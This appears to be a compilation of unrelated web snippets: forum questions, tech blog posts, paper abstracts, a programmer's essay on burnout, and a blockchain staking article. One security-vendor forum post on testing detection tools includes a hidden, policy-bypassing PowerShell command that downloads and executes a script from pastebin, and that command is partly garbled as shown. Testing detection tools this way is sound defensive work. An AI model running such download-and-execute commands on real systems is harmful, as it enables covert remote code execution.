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The problem of inference based on a rounded random sample from the exponential distribution is treated. The main results are given by an explicit expression for the maximum-likelihood estimator, a confidence interval with a guaranteed level of confidence, and a conjugate class of distributions for Bayesian analysis. These results are exemplified on two concrete examples. The large and increasing body of results on the topic of grouped data has been mostly focused on the effect on the estimators. The methods and results for the derivation of confidence intervals here are hence of some general theoretical value as a model approach for other parametric models. The Bayesian credibility interval recommended in cases with a lack of other prior information follows by letting the prior equal the inverted exponential with a scale equal to one divided by the resolution. It is shown that this corresponds to the standard non-informative prior for the scale in the case of non-rounded data. For cases with the absence of explicit prior information it is argued that the inverted exponential prior with a scale given by the resolution is a reasonable choice for more general digitized scale families also.
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|Yes, I chased a rabbit across our "lawn"|
to capture this shot.
I have to admit it, I am no longer the young snapper I once was. I have been programming for over 33 years if you count teaching myself Basic when I was 7. As a professional programmer I have been working in the field for over 14 years. So I have seen a lot of code and written a lot of code.
As a seasoned dev, I am the opposite of the Get Off My Lawn crowd when it comes to new devs. I read My Lawn by Uncle Bob who is preaching the Come to My Lawn mantra, not get off it, and it opened my eyes to my position.
In the article he points out that 1 in 16 developers are 40 or older. That is me.
Is the population of older devs quitting? No, not at all. We are still working but the inflow of new devs is causing the developer population to double about ever 5 years. So, the ranks of the older dev is shrinking in proportion to all devs, but not really decreasing in size.
The article by Uncle Bob made me think of the value I bring to a team. When I talk to younger I often see my younger self in them. They express frustration with many of the same challenges that I faced when I was younger. For some of those challenges I have figured out a path that works for me and some I am still figuring out.
I am also reminded of my younger self's hubris. I used to think older were foolish when they told me to take it easy. Reign in the late nights. But I was being a hero! I was producing tons of code compared to them. Why chill and work a normal day? I was unstoppable!
The flipside was that I was debugging my late night mistakes, spending time trying to figure out what I had written, and finding bugs in code I had not fully tested. Then I inevitably removed code that was not needed.
At some point I smartened up. Probably when I got married and we had kids. I had to work more efficient.
I decided there had to be a better way. I stopped and started to look at my practices. I started to do things like keep a journal of my bugs. I did this for a few months and then started to attack the repeating problems/bugs I had. This got rid of a lot of my bugs and taught me to slow down and reread what I was about to commit.
Then I started to look at the meta me. What outside of work and programming had an impact?
- Get 8 hours sleep. Ok, that sure helped.
- Exercise daily. When I do, it makes me a happier and more alert person as a whole. Bonus for work.
- Eating right. Makes me less groggy after a heavy meal, reduces the high/low of sugar rushes, and helps me think clearer.
- Reducing my coffee intake to just caffeinated (1/day), not high octane caffeinated!
- I started to practice TDD or unit testing of some sort. No more, large integration tests for all my testing needs. I have been freed to refactor code to make it even easier to read and maintain.
- Minimize methods to do concise chunks of work. I never was one for sprawling full page or multi-page multi-methods but I started to reduce the number of input parameters so that each method was concise and did a well defined job.
Then I looked at how I planned and wrote my code. I started to look at how to make my code easier to read and maintain.
These activities took months/years of introspection, controlled experiments and then putting new practices into place to help me be a better programmer. It has meant I have had to become realistic with my time and how far I can push myself. My desire to be superman has had to be tempered.
Superman syndrome I have learned leads to one thing: Burn out!
Burn out leads to frustration. Frustration with yourself and then when you are tired of blaming yourself you blame others. You start looking for another team if your org is large enough or you look for another company if it is not. This does not need to be the case.
The worse part of leaving one job for another is that you are thrust into a situation where you, most likely, will feel you need to prove yourself. Enter Superman and repeat cycle.
In the short term, people love you and you get a buzz from being such an awesome code god. But burn out creeps back in and bam, sucks-ville. It's not fun in the long run and not sustainable.
The Come to My Lawn article got me back to thinking about how I can help pass this hard-won experience on to other teams. For a while, I have noticed I am working with younger teams these days and then realized it's not the team that is young. It is me getting older.
Well, I am fine with that.
I love coding, I love learning, I love teaching. If I can help my teammates to not burn out and look for greener pastures, then I look forward to my "programmer old age" and sharing a drink with you on my lawn.
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Pop-culture references to Skynet and a forthcoming “war against the machines” are perhaps a little too common in articles about AI (including this one and Larry’s post about Google’s RankBrain tech), but they do raise somewhat uncomfortable questions about the unexpected side of developing increasingly sophisticated AI constructs – including seemingly harmless chatbots.
Dialogflow is a very robust platform for developing chatbots. One of the strongest reasons of using Dialogflow is its powerful Natural Language Understanding (NLU). You can build highly interactive chatbot as NLP of Dialogflow excels in intent classification and entity detection. It also offers integration with many chat platforms like Google Assistant, Facebook Messenger, Telegram,…
The process of building, testing and deploying chatbots can be done on cloud based chatbot development platforms offered by cloud Platform as a Service (PaaS) providers such as Yekaliva, Oracle Cloud Platform, SnatchBot and IBM Watson. These cloud platforms provide Natural Language Processing, Artificial Intelligence and Mobile Backend as a Service for chatbot development.
As artificial intelligence continues to evolve (it’s predicted that AI could double economic growth rates by 2035), conversational bots are becoming a powerful tool for businesses worldwide. By 2020, it’s predicted that 85% of customers’ relationship with businesses will be handled without engaging a human at all. Businesses are even abandoning their mobile apps to adopt conversational bots.
Before you even write a single line of code, it's important to write a functional specification so the development team has a clear idea of what the bot is expected to do. The specification should include a reasonably comprehensive list of user inputs and expected bot responses in various knowledge domains. This living document will be an invaluable guide for developing and testing your bot.
Companies and customers can benefit from internet bots. Internet bots are allowing customers to communicate with companies without having to communicate with a person. KLM Royal Dutch Airlines has produced a chatbot that allows customers to receive boarding passes, check in reminders, and other information that is needed for a flight. Companies have made chatbots that can benefit customers. Customer engagement has grown since these chatbots have been developed.
We need to know the specific intents in the request (we will call them as entities), for eg — the answers to the questions like when?, where?, how many? etc., that correspond to extracting the information from the user request about datetime, location, number respectively. Here datetime, location, number are the entities. Quoting the above weather example, the entities can be ‘datetime’ (user provided information) and location(note — location need not be an explicit input provided by the user and will be determined from the user location as default, if nothing is specified).
Like apps and websites, bots have a UI, but it is made up of dialogs, rather than screens. Dialogs help preserve your place within a conversation, prompt users when needed, and execute input validation. They are useful for managing multi-turn conversations and simple "forms-based" collections of information to accomplish activities such as booking a flight.
1-800-Flowers’ 2017 first quarter results showed total revenues had increased 6.3 percent to $165.8 million, with the Company’s Gourmet Food and Gift Baskets business as a significant contributor. CEO Chris McCann stated, “…our Fannie May business recorded positive same store sales as well as solid eCommerce growth, reflecting the success of the initiatives we have implemented to enhance its performance.” While McCann doesn’t go into specifics, we assume that initiatives include the implementation of GWYN, which also seems to be supported by CB Insights’ finding: 70% of customers ordering through the chat bot were new 1-800-Flowers customers as of June 2016.
Students from different backgrounds can share their views and perspectives on a specific matter while a chatbot can still adapt to each one of them individually. Chatbots can improve engagement among students and encourage interaction with the rest of the class by assigning group work and projects - similarly to what teachers usually do in regular classes.
For starters, he was the former president of PayPal. And he once founded a mobile media monetization firm. And he also founded a company that facilitated mobile phone payments. And then he helped Facebook acquire Braintree, which invented Venmo. And then he invented Messenger’s P2P payment platform. And then he was appointed to the board of directors at Coinbase.
An AI-powered chatbot is a smarter version of a chatbot (a machine that has the ability to communicate with humans via text or audio). It uses natural language processing (NLP) and machine learning (ML) to get a better understanding of the intent of humans it interacts with. Also, its purpose is to provide a natural, as near human-level communication as possible.
Chatfuel is one of the leading chatbot development platforms to develop chatbots for Facebook Messenger. One of the main reasons of Chatfuel’s popularity is easy to use interface. No knowledge of programming is required to create basic chatbot. People with non-technical background too can create bots using the platform and launch on their Facebook page.…
Message generator component consists of several user defined templates (templates are nothing but sentences with some placeholders, as appropriate) that map to the action names. So depending on the action predicted by the dialogue manager, the respective template message is invoked. If the template requires some placeholder values to be filled up, those values are also passed by the dialogue manager to the generator. Then the appropriate message is displayed to the user and the bot goes into a wait mode listening for the user input.
Can we provide a better way of doing business that transforms an arduous “elephant-in-the-room” process or task into one that allows all involved parties to stay active and engaged? As stated by Grayevsky, “I saw a huge opportunity to design a technology platform for both job seekers and employers that could fill the gaping ‘black hole’ in recruitment and deliver better results to both sides.”
24/7 digital support. An instant and always accessible assistant is assumed by the more and more digital consumer of the new era. Unlike humans, chatbots once developed and installed don't have a limited workdays, holidays or weekends and are ready to attend queries at any hour of the day. It helps to the customer to avoid waiting of a company's agent to be available. Thus, the customer doesn't have to wait for the company executive to help them. This also lets companies keep an eye on the traffic during the non-working hours and reach out to them later.
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I got some issues with a few things Pulumi does before we can actually start migrating over, I am hoping I could get some eyes on this and maybe even suggestions.
I am not comfortable with secrets stored in the repo. Encrypted or not.
We do store the secrets on Github, but not in the repo, but as Github Action secrets.
In fact, we also store configs there as clear text.
In the future we would like to store our configs as an .env file and read that into the CI.
Is there a way Pulumi could work without config and secrets being defined in the stack.yml file?
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looking for a good rework station for nVidia 8600 GPU
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With the growing number of MacBook Pros with the nVidia 8600M GPU issue now sitting on my shelf, and Apple starting to turn down repairs on these machines. I'm looking to buy a good rework, re-ball, soldering station and template for replacing these chips. I'd like to do the best job possible on these machines so I'm not to interested in just re-balling the chips. I'd rather replace the chips with new ones because I like to do the job just once. Can anyone recommend a good station, template, where to buy new chips, types of solder and flux for doing really professional work. Also would it be possible to install an upgraded chip on these machines?
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VMware vCenter Server Foundation provides powerful management tools for smaller environments looking to rapidly provision, monitors, and control virtual machines. Previously, vCenter Server Foundation only support managing up to (3) hosts much like the vSphere Essentials Kits. With the release of vSphere 6.5 U1, VMware has changed the licensing to now support up to (4) hosts!
Analyze and remediate issues quickly with visibility into vSphere virtual infrastructure.
Deliver the security and availability of vSphere through automated proactive management features such as automated load balancing and out-of-the-box automation workflows.
A vCenter HA cluster consists of three vCenter Server Appliance instances. The first instance, initially used as the Active node, is cloned twice to a Passive node and to a Witness node. Together, the three nodes provide an active-passive failover solution.
DEMO: vCenter Server Appliance (VCSA) 6.5 – Part 3
This enablement video is Part 3 of a video series. In part 1, I showed you how to deploy the vCenter Server Appliance 6.5. In Part 2, I show you how to configure the appliance itself from the appliance admin console and go through some initial settings. If you have not watched Part 1 & 2, I highly recommend you go back and watch them first in order. The links to all (3) videos are listed below.
In the Part 3 video, I show you some basic initial configurations in the vCenter Server Appliance 6.5 from the vSphere Web Client. These configurations include adding the appliance to an Active Directory domain, adding Active Directory as an Identity Source, etc.
DEMO: vCenter Server Appliance (VCSA) 6.5 – Part 2
(Configuration, Backup, & Restore)
This enablement video is part 2 of a video series. In part 1, I showed you how to deploy the vCenter Server Appliance 6.5. In Part 2, I show you how to configure the appliance itself from the appliance admin console and go through some initial settings. Then I show you the new feature in the VCSA 6.5 appliance where you can directly backup and restore VCSA from the appliance itself. This is one of the new features of the VCSA 6.5. This like some of the other new features (Builtin – HA / Update Manager) are only available in the VCSA 6.5, but not in the Windows-based version of vCenter Server 6.5.
If you missed Part 1 of this demo series, I highly recommend you watch it first before watching Part 2. Then after watching Part 1 & 2, watch Part 3 which covers configuring the vCenter Server via the vSphere Web Client.
DEMO: vCenter Server Appliance (VCSA) 6.5 – Part 1 (Deploying)
Are you looking to deploy the new vCenter Server Appliance (VCSA) 6.5 into your lab or production environment? If so, check out my demo video that will walk you through how to deploy the VCSA 6.5. I cover the basic configuration settings to get you up and running quickly!
After you watch this video, then watch Part 2 & 3 of this demo series covering the configuration of the appliance itself from the appliance admin console and then from within the vSphere Web Client.
Cloud has been a hot topic in IT for quite a while, for such valid reasons and benefits it brings as agility and economies of scale. More and more customers start to embark on the cloud journey, whether it’s DR to cloud, using cloud as a Tier 3 storage or even full production migrations for […]
https://kb.vmware.com/kb/2091961 This video demonstrates how to backup and restore the embedded vCenter Server 6.0 vPostgres database Backing up and restoring your database protects the data stored in your database. Note: This video is only supported for backup and restore of the vPostgres database to the same vCenter Server. Use of image-based backup and restore is the only solution supported for performing a full, secondary appliance restore. For additional information, see VMware Knowledge Base article 2091961 at the following URL https://kb.vmware.com/kb/2091961
VMware has announced that VMware vSphere 6.5 has gone general available this week. Now installing VMware vCenter Server Appliance 6.5 (VCSA) is even easier as the requirement for the client integration plugin has been removed and now the VCSA appliance is delivered via an ISO image with an installation wizard that’s been broken up into two stages.
Till now in this series we have discussed a lot of theory about vCenter Server/VCSA, deployment type etc and also we looked into system requirements for vCenter Server and PSC installation. Now its lab time where we will see the installation/configuration of the components.
The previous blog post was about natively backing up the VCSA 6.5. But a backup though is only as good as it’s ability to restore. To be able to restore a VCSA Backup, you will still need the VCSA 6.5 ISO handy, as you will kick off the Appliance Installer UI and click the ‘Restore’ … Continue reading »
If you remember in the first post of vSphere 6.5, I talked about the improvements in the VCSA 6.5 installer. Well, we are going to now take a look at the VCSA 6.5 installer and use to deploy our VCSA 6.5 appliance.
At today’s VMworld Europe conference in Barcelona VMware are announcing vSphere 6.5. There are a plethora of new features and fixes in this series of postings I plan to cover the ones that caught my eye and so for the … Continue reading →
I recently updated my vCenter Server Appliance and external Platform Services Controller in my lab to 6.0 U2, as I wanted to make use of the re-introduced VAMI, though there are also a number of other improvements. The VAMI or ApplianceManagement User Interface has been in the vCenter Server Appliance since version 5.0. It’s great […]]> I recently updated my vCenter Server Appliance and external Platform Services Controller in my lab to 6.0 U2, as I wanted to make use of the re-introduced…Read More
The migration path from Windows vCenter Server to the vCenter Appliance has just got a whole lot more official, after the VCSA migration tool gets it’s official release. Formerly only available as a Fling, the newly GA’d Windows vCenter Server to vCenter Server Appliance Migration Toolprovides an officially supported upgrade and migration path… The post VCSA Migration Tool gets official release appeared first on vMustard.com.
During my discussions with multiple customers in last few months, it seemed we discussed only about one major point. It was to decide between installation type of Distributed vs Simple Architecture. More often than not I have seen customers choosing a deployment model not based on careful considerations but based on what the general belief is. This blog The post Virtualization: Make an informed decision: Distributed vs Simple Architecture appeared first on VMware Cloud Management .
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This article was originally published on my personal blog Smakosh.
So I thought about sharing the tools I personally use personally or at work, so let’s start with the design tools:
- Adobe Illustrator for logos, icons, illustrations.
- Adobe XD or Invision Studio for designing user interfaces & wireframes.
- Adobe Photoshop for editing pictures & memes :D
- Adobe After effects for editing videos (I recommend Adobe Premiere Pro for editing videos & AE to add effects).
- Dribble for inspiration and I share my work there as well as on Behance
Let’s now get into the tools I use while coding:
I share my code & look for inspirations on:
If I’m simply coding an interface that I’ll might integrate into an app (web or native) I use plain html/css & vanilla js.
- Jekyll or Gatsby (I recommend Gatsby), I use Github to host the files and I deploy on Netlify.
For Css I’m cool to use what ever tech available out there that makes my task done quickly & well, I have personally used Bootstrap 3 & 4, Bulma, Lostgrid, Materliaze, Tachyons & made my own little framework called Unnamed that has over 175 stars on Github, but I seriously prefer using cssGrid & I always enjoy styling my elements from scratch since the components are fully reusable with react.
If I’m making a web app, for the front end I use the
create-react-app boilerplate as it’s the official one from the team that made React Js but I always have to add react-router, Redux, Recompose & many other modules I use the most.
I obviously use Git bash as my terminal when I’m on windows but I go with iTerm2 when I’m on macOS & VScode as my code editor (material theme).
For the backend, I was using php/mysql but I didn’t personally like it and switched to node js and so I currently use Express Js/Mongoose and Mongodb as database to make Restful APIs which I deploy on Heroku.
Forgot to mention that I sometimes use Firebase when I’m too lazy to work on the backend.
For native apps, I use React native to build mobile apps (Ios & Android).
For growth hacking, I focus more on building useful products that users really need in their lives and I simply share it on Product Hunt, Hacker news, Reddit and on social media.
I use Windows 10, MacOs Mojave, my MSI GP62 laptop, my macbook pro 2017 touchbar work laptop, Nexus 6p with a Dbrand wood skin. Full setup can be found here.
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Do you have any idea when this document will be ready?To all wanting to contribute languages. I'm busy writing documentation for this. It is very detailed and will be done soon. We then will provide documentation to anyone. Along with private GIT repos to manage your translations.
Editing Contacts in NL crashed. adb logcat says someting about "Contacts\res\drawable-nl-hdpi-finger " is missing. I decompiled, added it from dutch git, and removed the values-nl-hdpi-finger and now editing contacts works.
I could help the Dutch translation.
But I suggest getting everything centralized over here. This is the best way of working. The other translation sites that are willing to give up their domain can come here. I suggest you offer this solution. I don't like going between websites. Everyone will come here eventually. So I hope this is a new beginning for all of us.
I suggest we can also make a vote-like system Facebook has. Could help translations as well
there is a download file http://files.miuiandroid.com/2.5.18/multi/update.zip with a small size..Can I use this file to update my SGSII i9100...?
feel free to use our russian translation https://github.com/miuirussia/miui-v4-russian-translation or many of forks
yeap,it's our community maded. and you can use it and change, but only if our copyrights not removed.
it's because of langpack format of our translation tool called mfb.Thanks
I just make a script to pull the REPO, and merge it in. I won't do anything to touch copyrights. Your REPO structure is pretty strange with the
So I'll need some extra time expanding the scripts to handle the inconsistency. Hopefully i'll be done by tonight.
it's because of langpack format of our translation tool called mfb.
and one more thing, if you need we can host firmware files in our server in addition of yours...
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25 – 29 September 2017, Frascati, Italy
Earth Observation (EO) Open Science 2017, organized by the European Space Agency (ESA), presented new challenges and opportunities for Earth Observation research and stimulated the establishement of science community networks for the exploitation of EO data in a collaborative, cross-disciplinary and open way.
During the EO Open Science 2017 Conference, the ISPRA team, partner of ECOPOTENTIAL, presented the ‘RTSA’ (Raster Time Series Analysis) package for R programming language, a free and open source collection of analytics to perform spatio-temporal analysis on continuous terrestrial and marine bio-geophysical variables. The package allows to extract concise and comprehensive information taking advantages of many multitemporal analytical techniques, in order to support the detection of changes (abrubt and gentle) and the generation of scenarios to assess the progress and effectiveness of ongoing conservation policies and management activities (e.g. current PAs), thus supporting the environmental adaptive management, or to design new policies and plans (e.g. future PAs).
Furthermore, the ECOPOTENTIAL CNR-IIA team presented the ECOPOTENTIAL Virtual Laboratory, a cloud platform that allows running workflows (scientific business processes) for generating Essential Variables and indicators based on in-situ observations and EO data and products. The ECOPOTENTIAL Virtual Laboratory Platform supports the Open Science objectives, accessing open source algorithm code and open data for full reproducibility of scientific results. It is also aligned with major international and global programmes on Earth Observation for Sustainable Development Goals, with particular reference to GEO/GEOSS.
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Hello <insert name here>. I'm an inactive former patroller, however I may still visit on rare occurrences.
Welcome to Nukapedia!
Greetings, DogeNumbers, and welcome to the Fallout Wiki! We appreciate your contributions, and we hope you will make more!
If you have questions, you can ask in our forums, join the live chat, or ask one of our administrators or moderators. We hope you enjoy editing here and look forward to working with you!
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It looks like my joomla admin account has been hijacked.
I had been developing a site and now I cant log into the admin and the site is completely blank!!!
I'm a bit worried all of my hardwork has gone? How do I retrieve it or at least gain access to the admin again?!?!
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This item is planned. We will update you as we have more details.
Integration with Outlook is planned. We will update you as we have more details.
We have raised the priority of this work item, and it is currently being worked on. We don’t have any dates to share at this point, but will update when we have new status. Thank you!
We are now preparing for the roll out of Tasks in Teams which will integrate additional features integrating To-Do and Planner. This includes additional list views that also extend to tabs in teams. Further announcements about additional integration in our overall Tasks coherence effort will follow.
You can follow the rollout via our Roadmap item: https://www.microsoft.com/microsoft-365/roadmap?searchterms=57213. To see a preview of the experience, please visit https://youtu.be/rTATVGroEsQ.
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RDR testing tips
Let's start a topic for RDR testing tips of the day to safely simulate an attack that generates detections.
As you probably know, testing RDR with some simple detections can be as simple as opening command line prompt and running "whoami" on a target endpoint. However, you may also try safely something more advanced with powershell.
We will create .bat file that calls powershell to download code from 3rd party website, in this case pastebin.com containing the following harmless code:
# Filename: Hello.ps1 Write-Host Write-Host 'Hello World!' Write-Host # end of script
1. Create a hello-world.bat file
2. Add the following command:
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('c"); Powershell.exe -executionpolicy remotesigned -File $env:Temp\powershell.ps1
3. Save and run it on an endpoint that has the RDR client installed.
Please can you suggest a similar test for Unix environments?
One command you can use on Macs to generate a test Broad Context Detection is the following one:
python -m SimpleHTTPServer
Unfortunately we do not yet have a sensor for Linux but the above should work for Mac sensors.
So I have a client using RDR, they use automated logon scripts for powershell to retrieve data about the PCs and for the last two months, each and every day there is alerts. How would you close the finding down as being a 'Normal' or 'Common' procedure in the environment? It is not a false positive in the sense that there is a recon activity, but it is a day-to-day task within this environment. How do I get it to not appear as a finding?0
Thanks for writing this question to the Community since other RDR users might struggle with similar issues like yours.
First of all, there's a new feature introduced in September to automatically close incidents based on previously done user actions. This feature will close automatically repeating incidents matching incidents previously closed as false positive. Incident resolution will be Closed: Auto false positive. Email notification will not be sent for Auto false positives. This should be used primarily for events you do not want to appear as new alerts or findings.
If you repeating incidents are not identical match, then another option is to submit a whitelisting request. That will definitely help in case the auto false positive feature is not suitable in your client's environment.
Thank you Hannu
Is there a way to whitelist ourselves? Obviously each time a different user logs onto a different machine this will be picked up, perhaps a confirmation key in a powershell comment that F-Secure can interpret to whitelist when the script runs. Especially in the case of "hot-desk" style workstations?0
Hello Clive, the options mentioned earlier are the currently available options. I hope those two methods will work in your client's environment. You may provide further information as a private support ticket to allow us better consider your specific requirements while continuously improving RDR solution.
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Ian GrieveDo you want to write for packt?
Ian Grieve is a Microsoft Dynamics GP and CRM certified consultant, specializing in the delivery of Microsoft Dynamics GP and CRM projects. He is a senior consultant at Perfect Image Ltd., a Microsoft Partner and VAR in the North East of England. Ian has been working with Microsoft Dynamics GP since 2003. He has dealt with all aspects of the product life cycle from presales, to implementation, to technical and functional training, to post go-live support and subsequent upgrades, and process reviews. Alongside his work with Microsoft Dynamics GP, in recent years he has fulfilled a similar role dealing with Microsoft Dynamics CRM, with special emphasis on project delivery and the training of end users on the management of sales, marketing, and services. Ian is the co-author of Microsoft Dynamics GP 2013 Cookbook, produced Microsoft Dynamics GP Techniques online learning course, and was the technical reviewer for Microsoft Dynamics CRM 2011 Applications (MB2-868) Certification Guide and Microsoft Dynamics CRM 2011 Cookbook. In his spare time, Ian runs the azurecurve | Ramblings of a Dynamics GP Consultant (http://www.azurecurve.co.uk/) blog dedicated to Microsoft Dynamics GP and related products and tries, often unsuccessfully, to squeeze in extra time for the Dynamics CRM related blog coralcurve | A Consultant's Dabblings in Dynamics CRM (http://www.coralcurve.co.uk/).
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Big Ten latest to impose media controls
After some tough haggling with the media, the Southeastern Conference backed off many of the requirements it had attached to its media credentials.
Well, now the Big Ten has gotten in the act, seeking to limit how newspapers and TV stations can use the content they gather at games, especially online.
Six journalism organizations have written a letter asking for "an open and frank discussion" of the issue.
This is a fight that isn't going away. There is big money in college sports, and the conferences want to try to squeeze out every dime by monopolizing the distribution of content. Stand by for fights in other conferences and for years to come.
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[alsa-devel] ALSA 1.0.17rc2 release
tiwai at suse.de
Tue Jun 17 15:47:09 CEST 2008
At Tue, 17 Jun 2008 14:51:06 +0100,
Alan Horstmann wrote:
> On Tuesday 17 June 2008 11:29, you wrote:
> > At Tue, 17 Jun 2008 11:16:27 +0100,
> > Alan Horstmann wrote:
> > > On Tuesday 17 June 2008 10:18, I wrote:
> > > > On Monday 16 June 2008 10:24, Jaroslav Kysela wrote:
> > > > > ALSA 1.0.17rc2 packages (except tools, oss, python - no changes)
> > > > > were released and are available for download on ALSA server.
> > > > >
> > > > > The alsa-driver compilation with 2.4 kernels should be fixed in
> > > > > this release.
> > > >
> > > > The posted ak4531_codec issues are fixed. I didn't get to post details
> > > > of the other error, which still occurs with this 2.4.21-99 system:
> > > >
> > > > In file included from memory.c:3:
> > > > ../../alsa-kernel/pci/emu10k1/memory.c: In function
> > > > `synth_alloc_pages': ../../alsa-kernel/pci/emu10k1/memory.c:466: error:
> > > > `GFP_DMA32' undeclared (first use in this function)
> > > > ../../alsa-kernel/pci/emu10k1/memory.c:466: error: (Each undeclared
> > > > identifier is reported only once
> > > > ../../alsa-kernel/pci/emu10k1/memory.c:466: error: for each function it
> > > > appears in.)
> > > > ../../alsa-kernel/pci/emu10k1/memory.c:467: warning: implicit
> > > > declaration of function `page_to_pfn'
> > > > make: *** [memory.o] Error 1
> > > > make: Leaving directory
> > > > `/usr/share/alsa1.0.17rc2/alsa-driver-1.0.17rc2/ pci/emu10k1'
> > >
> > > I have just confirmed that pasting
> > >
> > > #define GFP_DMA32 ((__force gfp_t)0x04u)
> > >
> > > into /alsa-kernel/pci/emu10k1/memory.c (not a correct fix -just taken
> > > from 2.6.24 headers) enables build to complete. So there should be no
> > > other hidden issues.
> > Could you check whether the tarball below works?
> > ftp://ftp.kernel.org/pub/linux/kernel/people/tiwai/snapshot/alsa-driver-sna
> Yes that does build successfully.
> However, I had noticed that GFP_DMA32 was also used by /pci/asihpi/
> hpios_linux_kernel.c apparently without trouble.
Good catch. No problem for 2.4 kernels, though.
> But it would appear that
> asihpi is not being built, and checking shows neither is CS5535audio or hda.
> Make just reports 'nothing to be done..' in these 3 cases. Is that
Yes. Some drivers aren't built for 2.4 kernels or older because it
requires 2.6 (and newer) specific stuff intensively.
See alsa-driver/kconfig-vers file.
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We have a business application which can expose information using a wcf web service. The system allows us to nominate which tables and properties to expose. I'd lke to start by exposing customers, product categories and products.
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Topic category: Help with MCreator software
I've created an item that allows a player to set a position, and then teleport back to that position. I do this by having three "Global Map" variables for X, Y, and Z, setting them to the player's current position, and then setting their position to those variables when the second item is used. My question is: If one player sets a position, and then the other player uses the second Item, will they be sent to the position the first player set, or the default value of those variables? Basically, are these positional values unique to each player? If not, is there a way to make them? Because if they can't be, this item is pretty much useless. "Global Map" variables seem to be the only ones that work, and I don't want to publish a mod with this big of a potential bug. Help?
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You entice me with your persistent pursuit of my attention. Curiously I pause to explore your chase. Your enchanting sway delights me to deliver the fabric of my being to your feet and await instructions. Passionately I pursue you, but why would I anticipate your withdrawal? Why would I think you would leave me alone, hungering after you?
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Last month, we dived head-first into the swamp that is morality in gaming…and we highly recommend checking out that podcast episode to get up to speed.
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To Wix Blog users,
An update - not breaking news.
Last month we provided a status-update on the Wix Blog, and one of the things we promised are updates...
We've been quiet in the past couple of weeks since we don't want to prematurely set expectations, yet we do want to provide an update... any update.
We've successfully increased the number of developers on our Blog team (and are still recruiting), and the team is working on nothing but the "multi-content-per-blog-post" feature.
The complexity of the implementation (and the reason it's taking us longer than we all wish) is that the Blog "lives" in a very rich environment, and with many (many many) live Blogs out there.
(To Be Continued...)
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Anaxarchus (/ˌænəɡˈzɑːrkəs/; Ancient Greek: Ἀνάξαρχος; c. 380 – c. 320 BC) was a Greek philosopher of the school of Democritus. Together with Pyrrho, he accompanied Alexander the Great into Asia. The reports of his philosophical views suggest that he was a forerunner of Pyrrhonism.
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Over the past few years, the term "machine vision" has become more ambiguous than ever, as vision has extended far beyond just the "factory floor."
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The Split-Ender Pro claims to safely trim your split ends. We tried it out.
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If sadistic torture and a constant barrage of brutality is your favorite flavor of horror, The Collector will be right up your alley. More than any Saw movie could have done, though, it proved to me that this kind of stuff really isn't my thing.
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A Robust Reweighted L1-Minimization Imaging Algorithm for Passive Millimeter Wave SAIR in Near Field
AbstractThe Compressive Sensing (CS) approach has proven to be useful for Synthetic Aperture Interferometric Radiometer (SAIR) imaging because it provides the same high-resolution capability while using part of interferometric observations compared to traditional methods using the entirety. However, it cannot always obtain the sparsest solution and may yield outliers with the non-adaptive random measurement matrix adopted by current CS models. To solve those problems, this paper proposes a robust reweighted L1-minimization imaging algorithm, called RRIA, to reconstruct images accurately by combining the sparsity and prior information of SAIR images in near field. RRIA employs iterative reweighted L1-minimization to enhance the sparsity to reconstruct SAIR images by computing a new weight factor in each iteration according to the previous SAIR images. Prior information estimated by the energy functional of SAIR images is introduced to RRIA as an additional constraint condition to make the algorithm more robust for different complex scenes. Compared to the current basic CS approach, our simulation results indicate that RRIA can achieve better recovery with the same amount of interferometric observations. Experimental results of different scenes demonstrate the validity and robustness of RRIA. View Full-Text
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Zhang, Y.; Li, Y.; Zhu, S.; Li, Y. A Robust Reweighted L1-Minimization Imaging Algorithm for Passive Millimeter Wave SAIR in Near Field. Sensors 2015, 15, 24945-24960.
Zhang Y, Li Y, Zhu S, Li Y. A Robust Reweighted L1-Minimization Imaging Algorithm for Passive Millimeter Wave SAIR in Near Field. Sensors. 2015; 15(10):24945-24960.Chicago/Turabian Style
Zhang, Yilong; Li, Yuehua; Zhu, Shujin; Li, Yuanjiang. 2015. "A Robust Reweighted L1-Minimization Imaging Algorithm for Passive Millimeter Wave SAIR in Near Field." Sensors 15, no. 10: 24945-24960.
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Acumen is a simple, robust digital library system using PHP, MySQL, and Apache. Easy to set up and administer, does not complicate workflows, supports all browsers, and automatically creates and updates its own index database.6 weekly downloads
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Staking & oracles
This is the fifth post in our series, “Getting APIs on the Blockchain”.
This particular article in our series might seem a bit out-of-place at first, so let me provide a bit of context. Previously we discussed the significance of APIs and the problem with connecting existing APIs to the blockchain. We then began to introduce some of the components of our solution via defining first-party oracles (and, in particular, comparing them with third-party oracles).
Now, why are we discussing staking? As we introduce the components of our solution to the API Connectivity Problem, eventually comes the elucidation of our chosen security model. In particular, we move away from oracle-level staking as an approach to security. This article gives a relatively short and informal argument as to why. (We refer you to our whitepaper for a more formal discussion.)
Although I am sure anyone reading this far into this article is probably familiar with staking, let me offer a quick refresher. The concept of staking originated with Proof of Stake¹, which offered an alternative to the Proof of Work mechanism that fuelled Bitcoin’s Satoshi consensus algorithm.²
Pardon my hand-waviness: in general, Proof of [X] is a part of a mechanism for selecting a miner to validate a number of transactions and then add them — in the form of a “block” — to the blockchain. With Proof of Work, the miner shows they did the necessary, computationally-intensive work (to create a new block) up front (and, importantly, were the first to do so). In contrast, Proof of Stake offers a “skin in the game” approach to selecting the next block creator: miners put up tokens (their “stake”) and are usually selected based on some function of the size of their stake. Importantly, this stake is “slashed” if the miner behaves maliciously and does not create an honest block .
Of course, there are plenty of details omitted in the above definitions, but I think this is sufficient for our purposes here. The important point being: staking in crypto/blockchain systems is used as a mechanism to punish malicious behaviour (and thus, vice-versa, incentivize honest behaviour).
Staking has since expanded in meaning — it isn’t just used in Proof of Stake blockchain networks— but its meaning in context can usually be extrapolated from the original definition. Namely, staking offers a mechanism to punish dishonest (or lazy, or risky) behaviour via direct financial loss and award honest, system-beneficial behaviour via direct financial gain.
A quick note on consensus
Certain malicious behaviour causes “splits” in the blockchain.³ Consensus arises through the a priori agreement — between participants in the network — that the longest blockchain is the correct one. The correctness of the longest chain is substantiated by the amount of work (Proof of Work) or amount of “skin in the game” (Proof of Stake) used to create it.
For completeness: this also gets at why double-spends are prevented (under certain conditions) in a blockchain: only one valid chain wins out in the end.
Quantum leap into continuous numbers
Decentralized oracle networks stretch the concept of consensus. We should be wary of considering oracles “agreeing” on a value (via some aggregation method) as remotely similar to consensus on the validity of transactions (as is the case with existing blockchain-based consensus algorithms).
